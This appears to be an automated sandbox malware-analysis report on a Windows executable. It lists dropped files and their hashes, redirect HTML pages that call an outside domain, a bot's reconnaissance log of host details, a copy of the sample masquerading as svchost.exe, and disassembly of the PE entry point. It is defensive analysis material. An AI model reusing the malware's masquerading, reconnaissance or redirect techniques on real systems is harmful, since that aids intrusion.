                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:04 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):845370
                                                                                                                                                                                                                  Entropy (8bit):1.6762508199950272
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:opKPQ95LeY5aQpVsE2PdcnuG32Mc2w4kVD/mFPCxHi25jpn17KwPKF71Dlhyto7U:opIQ95WQwEMcr64kVzHiYKQU715Rv
                                                                                                                                                                                                                  MD5:FEE434063C68BBCE4550127000772865
                                                                                                                                                                                                                  SHA1:084FE8CF77E7C4B45A1FAA19C006F47761D76782
                                                                                                                                                                                                                  SHA-256:4065EE6865918687988BC91B7D063A2A7ABC1A2B1AE207A44B8BB4E052776638
                                                                                                                                                                                                                  SHA-512:AA1F8432AB369D26A86A0614577D2F331E87AAD0893CDF7C6532CF2B45AD8DF4533F8CDA0730A3279C68E28AA2DB0948B7237A53506A07EB55E18190480FD60C
                                                                                                                                                                                                                  Malicious:false
Preview:MDMP [binary minidump header; readable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406]
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8444
                                                                                                                                                                                                                  Entropy (8bit):3.711755849069462
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJJRI6BZ6Y2DVSU9kHgLgmf+KLpra89bgQsfogm:R6lXJQ6BZ6YISU9Hgmf9FgjfW
                                                                                                                                                                                                                  MD5:E0C1D428AA38BFE7FCA00794806EA68A
                                                                                                                                                                                                                  SHA1:A57932CF2E831806BC2DA5D928A9A4690196733F
                                                                                                                                                                                                                  SHA-256:624027D952A0BFE4234B805F176AC0553E099355928EB0F5576A781DF649F3E8
                                                                                                                                                                                                                  SHA-512:7AD138080D2D96E43F65B79B30E328E763FD7DDC59F279AA079DDFEFEF1ED96B470B450260656F444D331439AF329D25484DD219BAB81252E5377137E69F2615
                                                                                                                                                                                                                  Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6912</Pi
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.598889790700874
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYAYm8M4Jw1GFH+q8rtFMTmWd:uIjfZI77P7VQJwOAmTmWd
                                                                                                                                                                                                                  MD5:4DF840BFC1A1180D85923AFD73BC4910
                                                                                                                                                                                                                  SHA1:8BC95F5E768304CFD91CA87E0DCA0946097CAEFE
                                                                                                                                                                                                                  SHA-256:7C32A3D2B02D1D043719DA009CF4CE0861C9CB80B328B1E073132C5820B0D4D9
                                                                                                                                                                                                                  SHA-512:1FE2E078FD05EFE75CB34013870E08B164B74E0D4B60E763DD4FFDF7FCD4D9A0C481EF61E2AF94FE5BB04A26A046D887AB28BA2E06663E3FBE16D199DE5CB6DF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:06 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1015772
                                                                                                                                                                                                                  Entropy (8bit):1.7510087102413143
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:5DebQ7Hdq13qtfdjh8fwrN6fMRdceeByTr0nrqjNCWj2OT/9WqswjBJbWxeRqmOb:5DeOdqKf788RdcXc4rqJ2OTVlsEWFmJe
                                                                                                                                                                                                                  MD5:625F76B7A8D1BFE709CFBA09A9FD420A
                                                                                                                                                                                                                  SHA1:3BBAF7A3E61FC5CB94AC770114265F6BE4E5B3D6
                                                                                                                                                                                                                  SHA-256:3DEF42AB8CB5A8D99B1DE53BF1B9A558E73E891BA665F728C8F455DC0016CDF1
                                                                                                                                                                                                                  SHA-512:C726B6AAECC930B4350B111E0B4BFBC22D572CAB4F7BEE466B5D10083ED13375F4FCFC5EF47BA3BA7AFF1B1D65C4E8260F57C2D9DC32F3B31D30821874A97DDF
                                                                                                                                                                                                                  Malicious:false
Preview:MDMP [binary minidump header; readable strings: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406]
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):593
                                                                                                                                                                                                                  Entropy (8bit):4.470551863591405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                                  MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                                  SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                                  SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                                  SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                                                  Entropy (8bit):4.802925647778009
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                                  MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                                  SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                                  SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                                  SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):593
                                                                                                                                                                                                                  Entropy (8bit):4.470551863591405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                                  MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                                  SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                                  SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                                  SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                  Entropy (8bit):4.749712087982617
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:q43t0t1Ah/QRmApC0M8SIXqlhphGIdPmHQhXlJEGmTAXfGb:T81Y/QDCL8ElgMRlyHTAPGb
                                                                                                                                                                                                                  MD5:47E7A4B4DAF650B709C93B18E23EB376
                                                                                                                                                                                                                  SHA1:D7A19DDAB1A9BB567F0E0279C44BBEBED3200C85
                                                                                                                                                                                                                  SHA-256:D74FBC8646719E8D2EB6C2D92A56FEA890358B9D57173746A5E6B658ABAAED59
                                                                                                                                                                                                                  SHA-512:2307A1BFF8B8938E8976EA64AF7A79E4B3D88256C19307F50033AA1418C535AF0FEA639B292940234427857C22738B90FA5B1651ACAB4A62C9271BED12665BDB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>..<head>..<meta name="robots" content="noarchive" />..<meta name="googlebot" content="nosnippet" />..</head>..<body>..<div align=center>..<h3>Error. Page cannot be displayed. Please contact your service provider for more details. (10)</h3>..</div>..</body>..</html>
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):173
                                                                                                                                                                                                                  Entropy (8bit):4.43096450882803
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                                  MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                                  SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                                  SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                                  SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):173
                                                                                                                                                                                                                  Entropy (8bit):4.43096450882803
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                                  MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                                  SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                                  SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                                  SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                                                  Entropy (8bit):4.802925647778009
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                                  MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                                  SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                                  SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                                  SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):6238
                                                                                                                                                                                                                  Entropy (8bit):5.218070325458542
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:ehyRg64Zem1MWiYixeouiiqP77aqOXZ1CGxoZ5IfI0IXI7IKILIBI9I9IomIgIgT:eAd4XIxJEYS7Rzc6nclQm
                                                                                                                                                                                                                  MD5:BDE8185E4B45A90E46296BB071CBB425
                                                                                                                                                                                                                  SHA1:77BEED06250DC8D2E32CBDEAE06281CFABAABE1D
                                                                                                                                                                                                                  SHA-256:7E211D4682F544F04E09DCB6DD407F808C080D241ED70AE9B5E4C86C2028754A
                                                                                                                                                                                                                  SHA-512:A216A84CE4FD878BA69EB1A2A2E53D0DC92307F5DC62F35979D91CC48C6C5CBA5EC3A0B34E554C60B1F1963C949E1C05A5E83F81C5590246389551FBBDAE58E8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{BotVer: 4.0.1}.{Process: C:\Windows\apppatch\svchost.exe}.{Username: user}.{Processor: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel}.{Language: ENG}.{Screen: 1280x1024@32}.{Date: 03:Dec:2024}.{Local time: 09:14:00}.{GMT: -5:00}.{Uptime: 21d 20h 48m}.{Windows directory: C:\Windows}.{Administrator: true}.IE history:.{http://go.microsoft.com/fwlink/p/?LinkId=255141}.netstat.{Proto.Local address.Remote address.State.TCP.0.0.0.0:135.0.0.0.0:0.LISTEN.TCP.0.0.0.0:445.0.0.0.0:0.LISTEN.TCP.0.0.0.0:5040.0.0.0.0:0.LISTEN.TCP.0.0.0.0:19706.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49664.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49665.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49666.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49667.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49668.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49669.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49670.0.0.0.0:0.LISTEN.TCP.0.0.0.0:64111.0.0.0.0:0.LISTEN.TCP.192.168.2.6:139.0.0.0.0:0.LISTEN.TCP.192.168.2.6:49480.1.1.1.1:53.TIME_WAIT.TCP.192.168.2.6:49482.2.23.209.182:80.TIME_WAIT.TCP.192.168.2.6:49697.192.168
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\UMwpXhA46R.exe
                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):1179648
                                                                                                                                                                                                                  Entropy (8bit):6.468101493516739
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24576:C800kHPa2DfTNjx+mZCkt76f/24pN+XNqNG6hditW:l0riKf9Ckt7c20+9qNxUW
                                                                                                                                                                                                                  MD5:E132561B9EE04A2EDDF6460BE4A89362
                                                                                                                                                                                                                  SHA1:0DB3025D5EF4529738B05DC2A0148D83E7F660D9
                                                                                                                                                                                                                  SHA-256:ADF0EF04AF080030F6E91DA2B478CC52D85E3F9481C575012FBACA76CEFF6E1F
                                                                                                                                                                                                                  SHA-512:233138A7AF07E4755054A11B125AE49A6288E9BDA1974E4AD0A6DCA507F9C4BF9AF5E67FB85C763B7EFA3761A815F16A49FB500C0B615F0E523FF67F65DF6551
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".:.................2..........;........@....@...................................H.....................................R..........4............................................................................................................text...[0.......2.................. ..`.j......#k...P.......6..............@..@.nkytZ...............<..............@..@.N......hQ...P.......@..............@..@.fc.....&............N..............@....data....6...@...8...T..............@....s.......e..........................@....w..................................@....rsrc...4...........................@..@.reloc...............2..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\UMwpXhA46R.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Entropy (8bit):6.468102568684418
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                  File name:UMwpXhA46R.exe
                                                                                                                                                                                                                  File size:1'179'648 bytes
                                                                                                                                                                                                                  MD5:239b74d7ac38014e61cc335630ac22d6
                                                                                                                                                                                                                  SHA1:ef7eacbab6cd35771675717a0a84939f529c1ac4
                                                                                                                                                                                                                  SHA256:a53ec0d01746cd6c44b9c207df3101c8fe7e78bbe08a125dad833b1a41636668
                                                                                                                                                                                                                  SHA512:8a43731dd67421634928f30b6e1cff9638867d6a16bcdf93126526b3eaec64d2c9a5b98fa85f0b9be094c6efd300ccb020c48f8c9920fd88dd87a8b87ca04a4f
                                                                                                                                                                                                                  SSDEEP:24576:L800kHPa2DfTNjx+mZCkt76f/24pN+XNqNG6hditW:w0riKf9Ckt7c20+9qNxUW
                                                                                                                                                                                                                  TLSH:EA451241B3D954C0E2338A7798BAD72098B6BDAC5B30CE5F4394765D1DB32E1B839E06
                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".:.................2..........;........@....@..................................X9f...................................
                                                                                                                                                                                                                  Icon Hash:004ab5b5d5b59535
                                                                                                                                                                                                                  Entrypoint:0x401b3b
                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                                                                  Time Stamp:0x3A11222E [Tue Nov 14 11:29:50 2000 UTC]
                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                  Import Hash:616d060f84174fbe550615d295f4ce51
                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                  mov ecx, 00000000h
                                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                                  call dword ptr [004150F8h]
                                                                                                                                                                                                                  mov dword ptr [00424B42h], eax
                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                                                                  sub ebx, 0000010Ah
                                                                                                                                                                                                                  jnc 00007F13B4D5FB08h
                                                                                                                                                                                                                  add ebx, 00000D32h
                                                                                                                                                                                                                  mov ecx, ebx
                                                                                                                                                                                                                  shr ecx, 1
                                                                                                                                                                                                                  add ecx, esi
                                                                                                                                                                                                                  sub ecx, 00000222h
                                                                                                                                                                                                                  ror ecx, 05h
                                                                                                                                                                                                                  sub ecx, dword ptr [00425025h]
                                                                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                                                                  sub dword ptr [00424AEDh], ecx
                                                                                                                                                                                                                  shr ecx, 1
                                                                                                                                                                                                                  add dword ptr [004250ADh], ecx
                                                                                                                                                                                                                  call 00007F13B4D60854h
                                                                                                                                                                                                                  mov dword ptr [00424377h], eax
                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                  pop edx
                                                                                                                                                                                                                  push edx
                                                                                                                                                                                                                  mov ecx, 00486F5Ah
                                                                                                                                                                                                                  mov ebp, 00071E7Eh
                                                                                                                                                                                                                  mov eax, ebp
                                                                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                                                                  call dword ptr [ecx]
                                                                                                                                                                                                                  mov dword ptr [00424170h], eax
                                                                                                                                                                                                                  mov esi, 0020A87Ch
                                                                                                                                                                                                                  mov eax, esi
                                                                                                                                                                                                                  shl eax, 1
                                                                                                                                                                                                                  call dword ptr [eax]
                                                                                                                                                                                                                  mov dword ptr [0042424Eh], eax
                                                                                                                                                                                                                  or eax, eax
                                                                                                                                                                                                                  jne 00007F13B4D5FB05h
                                                                                                                                                                                                                  mov edx, esi
                                                                                                                                                                                                                  dec edi
                                                                                                                                                                                                                  mov edi, 00000001h
                                                                                                                                                                                                                  mov eax, edi
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  mov ecx, 0020A86Ah
                                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                                  shl eax, 1
                                                                                                                                                                                                                  call dword ptr [eax]
                                                                                                                                                                                                                  mov dword ptr [00425205h], eax
                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                  mov eax, ebp
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  push esp
                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                  sub esp, 14h
                                                                                                                                                                                                                  lea eax, dword ptr [004245CCh]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15204 | 0xb4 | .N
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5f000 | 0x29434 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x89000 | 0x3fe | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1b514 | 0x1c | .fc
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x305b | 0x3200 | 746849c22bd1df3ec913e6afd3261c01 | False | 0.700703125 | data | 6.211906712870064 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.j | 0x5000 | 0x6b23 | 0x600 | 0ac67a98e2d3f6254b28e45da115c69b | False | 0.96875 | data | 7.160260489225009 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.nkytZ | 0xc000 | 0x8a0b | 0x400 | a47b6a356a3431ac9df3442ebc526efb | False | 0.728515625 | data | 5.978528077403749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.N | 0x15000 | 0x5168 | 0xe00 | 1dbd683313ed000c6b75f32744694ec5 | False | 0.47572544642857145 | data | 5.278775089069264 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fc | 0x1b000 | 0x8d26 | 0x600 | 12c7d10915b83bfd9faa65fa82180001 | False | 0.736328125 | data | 5.748360690216942 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
